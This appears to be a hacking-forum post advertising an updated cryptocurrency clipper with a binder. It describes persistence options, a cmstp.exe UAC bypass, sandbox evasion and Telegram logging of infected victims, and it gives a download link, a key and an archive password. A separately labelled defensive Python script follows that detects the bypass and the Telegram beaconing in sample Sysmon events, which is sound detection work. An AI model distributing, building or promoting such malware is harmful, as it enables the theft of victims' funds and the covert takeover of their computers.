OP 20 March, 2024 - 04:28 AM
(This post was last modified: 06 May, 2024 - 06:55 PM by angelbanker. Edited 1 time in total.)
Update v2
My team and I agreed on adding a binder to the clipper; everyone gave the okay, and the binder was successfully added.
Basic Binder Functions:
Implementation paths
1) Temp
2) AppData
3) UserProfile
4) AllUserprofile
5) Public
6) ProgramData
7) LocalAppdata
8) WinDir
9) System32
10) Current
11) Desktop
12) Startup
13) ProgramFiles
You can also use custom injection into any folder using the UAC bypass functions.
Normal startup - true/false
Single startup - true/false
Critical hiding - true/false
Autorun from registry editor - true/false
Add your loopback to allowed threats - true/false
Autorun for your Task Manager bind file - true/false
Functions to stub your clipper:
UAC bypass
Request to run the stub with administrator privileges
Kill bots (malware listed by code, kills by pid or mutex)
Skip virus environments: VMware, VBox, Hyper-V, sandbox, etc.
Clipper:
Added a function for clipper to send logs to telegram about a new infected device
The Telegram logging code sets certain parameters for ServicePointManager; the parameters are set to control the behavior of network requests.
In the code you will see in the clipper, this parameter handles 100-continue headers.
Next, the code uses WebClient to make HTTP requests to external servers (ip.com and the Telegram API); ip.com is needed for logging, as it will show the IP of the infected device in the logs.
In the end, the code uses the Telegram Bot API to send the logs.
Fixed UAC bypass function
BinaryPath - string variable containing path to executable file
CMSTP.exe - Windows system file
The Code method returns a string representing the instructions for the INF configuration file. This file is used to set certain parameters on the system.
SetInfFile(pp) is an external method or function that generates a string of settings for the INF file based on some input parameter pp of the CMSTP.exe bypass manipulator
The code has strings such as flag
The flag variable is set to True if the cmstp.exe file does not exist in the specified path (BinaryPath). This is checked with File.Exists(BinaryPath).
If flag and flag2 are both True, then False is returned
This means that if the cmstp.exe file does not exist, the program terminates execution and returns False.
HM headers that return TRUE after running cmstp.exe with certain permissions help to bypass UAC.
Download link: https://mega.nz/file/lSlzHILB
Mega key: PfYgeGLzCXUFs46lTZ3Arc5kFxIWnN5y-oWjxRp_O2s
Password for 7z: RooseveltRow
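Added defensive example (not the poster's code): the two behaviours advertised above, an auto-elevated cmstp.exe fed an attacker-written INF and a fresh implant phoning home over the Telegram Bot API, both leave predictable telemetry. The script below runs simple detections over Sysmon-style process-creation (EventID 1) and DNS-query (EventID 22) records and correlates them per image. The events, field names and image paths are constructed for this example, and the rule names are assumptions.

```python
import re

# Constructed Sysmon-like records (field names follow Sysmon's schema, values are made up).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmstp.exe",
     "CommandLine": r"cmstp.exe /au C:\Users\bob\AppData\Local\Temp\xyz.inf",
     "ParentImage": r"C:\Users\bob\AppData\Roaming\update.exe", "IntegrityLevel": "Medium"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c C:\Users\bob\AppData\Roaming\update.exe",
     "ParentImage": r"C:\Windows\System32\cmstp.exe", "IntegrityLevel": "High"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmstp.exe",  # benign VPN profile install
     "CommandLine": r'cmstp.exe "C:\Program Files\Corp VPN\corpvpn.inf"',
     "ParentImage": r"C:\Windows\explorer.exe", "IntegrityLevel": "Medium"},
    {"EventID": 22, "Image": r"C:\Users\bob\AppData\Roaming\update.exe",
     "QueryName": "api.telegram.org"},
    {"EventID": 22, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "QueryName": "api.telegram.org"},  # a browser talking to Telegram is expected
]

CMSTP = re.compile(r"(?i)(^|\\)cmstp\.exe$")
SILENT_FLAGS = re.compile(r"(?i)(?<![\w/])/(au|s|ni)\b")  # /au, /s, /ni: no UI shown to the user
INF_PATH = re.compile(r'(?i)"([^"]+?\.inf)"|(\S+\.inf)\b')
USER_WRITABLE = re.compile(r"(?i)\\(Temp|AppData|ProgramData|Public|Downloads|Desktop)\\")
TELEGRAM_OK = re.compile(r"(?i)\\(telegram|firefox|chrome|msedge|brave|opera)\.exe$")


def inf_path(cmdline):
    """Return the .inf argument from a cmstp command line, or None."""
    m = INF_PATH.search(cmdline)
    return (m.group(1) or m.group(2)) if m else None


def detect_cmstp_bypass(events):
    """Findings are (rule, suspect_image, detail) tuples."""
    findings = []
    for e in events:
        if e.get("EventID") != 1:
            continue
        image, parent, cmd = e["Image"], e["ParentImage"], e["CommandLine"]
        if CMSTP.search(image):
            inf = inf_path(cmd)
            # Silent flags or an INF in a user-writable directory: the launcher
            # (parent) is the suspect, not the signed Windows binary.
            if inf and (SILENT_FLAGS.search(cmd) or USER_WRITABLE.search(inf)):
                findings.append(("cmstp_silent_inf", parent, inf))
        elif CMSTP.search(parent):
            # Children spawned from RunPreSetupCommandsSection inherit the
            # auto-elevated token; cmstp.exe has no reason to start a shell.
            findings.append(("cmstp_child", image, e.get("IntegrityLevel", "?")))
    return findings


def detect_telegram_beacon(events):
    """Flag DNS lookups of telegram.org by images that are not messengers or browsers."""
    findings = []
    for e in events:
        if e.get("EventID") != 22:
            continue
        name = e.get("QueryName", "").lower()
        if name.endswith("telegram.org") and not TELEGRAM_OK.search(e["Image"]):
            findings.append(("telegram_api_from_unexpected_process", e["Image"], name))
    return findings


def correlate(events):
    """Images hit by more than one rule: launcher of the bypass AND the beaconing process."""
    seen = {}
    for rule, image, _ in detect_cmstp_bypass(events) + detect_telegram_beacon(events):
        seen.setdefault(image.lower(), set()).add(rule)
    return {img: rules for img, rules in seen.items() if len(rules) > 1}


if __name__ == "__main__":
    for f in detect_cmstp_bypass(SAMPLE_EVENTS) + detect_telegram_beacon(SAMPLE_EVENTS):
        print(*f)
    print("correlated:", correlate(SAMPLE_EVENTS))
```

The benign VPN install (signed INF under Program Files, launched from Explorer, no silent flags) is deliberately left unflagged so the rule is usable on real fleets; tune the `USER_WRITABLE` and `TELEGRAM_OK` lists to your environment.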